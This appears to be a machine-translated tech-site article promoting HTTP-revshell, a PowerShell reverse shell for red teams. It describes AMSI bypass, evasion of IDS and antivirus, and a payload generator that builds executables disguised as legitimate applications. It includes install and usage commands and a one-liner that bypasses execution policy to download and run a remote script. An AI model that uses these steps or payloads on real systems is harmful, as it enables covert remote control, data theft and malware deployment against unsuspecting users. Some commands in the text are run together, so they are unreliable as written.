Shulou(Shulou.com)05/31 Report--

This article will explain in detail what HTTP-revshell means, Xiaobian thinks it is quite practical, so share it with you for reference, I hope you can gain something after reading this article.

HTTP-revshell

HTTP-revshell is a PowerShell proxy-aware reverse Shell that bypasses AMSI. This tool is designed for red team researchers and penetration testers to provide researchers with a reverse Shell link via HTTP/S protocol. HTTP-revshell uses a covert data channel to gain control of the target device via Web requests, bypassing security solutions like IDS, IPS, and AV.

function introduction

SSL

proxy-aware

upload function

download function

error control

AMSI bypass

Server-side multi-session support

PowerShell function autocomplete

tool mounting

Researchers can clone the project source code locally and automate the installation of dependent components using the following command:

git clone https://github.com/3v4Si0N/HTTP-revshell.gitcd HTTP-revshell/pip3 install -r requirements.txt Data extraction using upload: upload /src/path/file C:\dest\path\file Download: download C:\src\path\file /dst/path/file View server.py Help-Server side using usage: server.py [-h] [--ssl] [--autocomplete] host port Process some integers. positional arguments: host Listen Host port Listen Port optional arguments: -h, --help show this help message and exit --ssl Send traffic over ssl --autocomplete Autocomplete powershell functions View WebRev.ps1 Help-Clients using Import-Module .\ Invoke-WebRev.ps1Invoke-WebRev -ip-port [-ssl] tool uses-server-multisession.py (server-side multisession support)

The server side supports establishing multiple links with the client side at the same time. The menu given below contains three basic commands, namely sessions, interact and exit:

- sessions --> Show current active sessions - interact --> Interact with a conversation, for example: interact - exit --> Close application

To modify a session, press CTRL+D to exit the current session without closing it.

Revshell-Generator.ps1-Payload Automatic Generator

This script helps us create an executable file with the Payload that we need to use the HTTP-rev shell. The tool provides six predefined templates and one template that supports customization. Tool-generated payloads disguise legitimate app icons, product information, copyright information, and more. In addition, they all open the original application before establishing a connection with the server and masquerade as legitimate applications to execute.

Payload generator uses: powershell -ep bypass "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1|iex tool usage sample

About "what does HTTP-revshell mean" this article is shared here, I hope the above content can be of some help to everyone, so that you can learn more knowledge, if you think the article is good, please share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.